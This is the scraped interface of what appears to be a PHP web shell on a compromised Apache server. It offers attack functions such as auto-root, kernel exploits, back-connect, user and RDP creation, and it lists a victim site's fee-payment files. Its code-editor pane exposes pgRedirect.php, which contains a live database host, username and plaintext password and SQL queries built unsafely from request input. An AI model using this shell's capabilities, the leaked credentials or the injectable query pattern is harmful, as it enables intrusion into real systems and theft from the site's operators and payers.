Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.222.161.245
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
results /
rcub /
[ HOME SHELL ]
Name
Size
Permission
Action
Paytm
[ DIR ]
drwxr-xr-x
copyinoasis
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
easy_zip
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
jquery-ui-1.9
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
links
[ DIR ]
drwxr-xr-x
razorpay
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
tarka_pdf
[ DIR ]
drwxr-xr-x
adds.jpg
39.03
KB
-rwxr-xr-x
adds1.jpg
293.14
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
cconfig.php
1.43
KB
-rwxr-xr-x
cconfig_old.php
1.12
KB
-rwxr-xr-x
config_paytm.php
1.44
KB
-rwxr-xr-x
db.sql
11.87
KB
-rwxr-xr-x
home.php
5.46
KB
-rwxr-xr-x
index.php
73
B
-rwxr-xr-x
index17042018.php
5.45
KB
-rwxr-xr-x
index_13112017.php
4.33
KB
-rwxr-xr-x
index_stop.php
4.62
KB
-rwxr-xr-x
jscript.js
23.88
KB
-rwxr-xr-x
pgRedirect.php
2.66
KB
-rwxr-xr-x
pgResponse.php
5.38
KB
-rwxr-xr-x
rcub_razorpay.csv
67
B
-rwxr-xr-x
result.php
3.72
KB
-rwxr-xr-x
result_17042018.php
3.11
KB
-rwxr-xr-x
subjectDetails.php
1.14
KB
-rwxr-xr-x
verify.php
5.31
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pgRedirect.php
<?php header("Pragma: no-cache"); header("Cache-Control: no-cache"); header("Expires: 0"); // following files need to be included require_once("./lib/config_paytm.php"); require_once("./lib/encdec_paytm.php"); $checkSum = ""; $paramList = array(); $servername = "97.74.228.93"; $username = "logisys3_logu"; $password = "Logisys@2106"; $dbname = "logisys3_gug"; /*$servername = "localhost"; $username = "root"; $password = ""; $dbname = "logisys3_dud";*/ $conn = new mysqli($servername, $username, $password, $dbname); $checkSum = ""; $paramList = array(); $appno = $_REQUEST['productinfo']; //$get_data = "select fregno,ftotalfee from appcandsum where appno = '{$appno}'"; $get_data = "select cs.fregno as fregno, IFNULL(cs.FTOTAL,0) as ftotalfee, control.funivname,pdf_logo_path, '999999999' as fmobileno ,'99999' as fname,'999999@gmail.com' as femail from control, res_stud cs inner join college c on cs.fcollcode = c.fcollcode where appno = '{$appno}'"; $result=$conn->query($get_data); if (mysqli_num_rows($result) > 0) { // output data of each row while($row = mysqli_fetch_assoc($result)) { $fregno = $row['fregno']; $ftotalfee = $row['ftotalfee']; } } $number = rand(10000000,99999999); $query = "update res_stud set forderid = '{$number}', fpaymenttype = 'paytm' where appno = '{$appno}'"; //$query = "update appcandsum set forderid = '{$number}', FPAYGATEWAY = 'paytm' where appno = '{$appno}'"; $result1 =$conn->query($query); $ORDER_ID = $number; $CUST_ID = $fregno; $INDUSTRY_TYPE_ID = "EducationGovernment"; $CHANNEL_ID = "WEB"; $TXN_AMOUNT = $ftotalfee; // Create an array having all required parameters for creating checksum. $paramList["MID"] = PAYTM_MERCHANT_MID; $paramList["ORDER_ID"] = $ORDER_ID; $paramList["CUST_ID"] = $CUST_ID; $paramList["MERC_UNQ_REF"] = $appno; $paramList["INDUSTRY_TYPE_ID"] = $INDUSTRY_TYPE_ID; $paramList["CHANNEL_ID"] = $CHANNEL_ID; $paramList["TXN_AMOUNT"] = $TXN_AMOUNT; $paramList["WEBSITE"] = PAYTM_MERCHANT_WEBSITE; $paramList["CALLBACK_URL"] = "http://results.logisys.org/gug/pgResponse.php"; $checkSum = getChecksumFromArray($paramList,PAYTM_MERCHANT_KEY); ?> <html> <head> <title>Merchant Check Out Page</title> </head> <body> <center><h1>Please do not refresh this page...</h1></center> <form method="post" action="<?php echo PAYTM_TXN_URL ?>" name="f1"> <table border="1"> <tbody> <?php foreach($paramList as $name => $value) { echo '<input type="hidden" name="' . $name .'" value="' . $value . '">'; } ?> <input type="hidden" name="CHECKSUMHASH" value="<?php echo $checkSum ?>"> </tbody> </table> <script type="text/javascript"> document.f1.submit(); </script> </form> </body> </html>
Close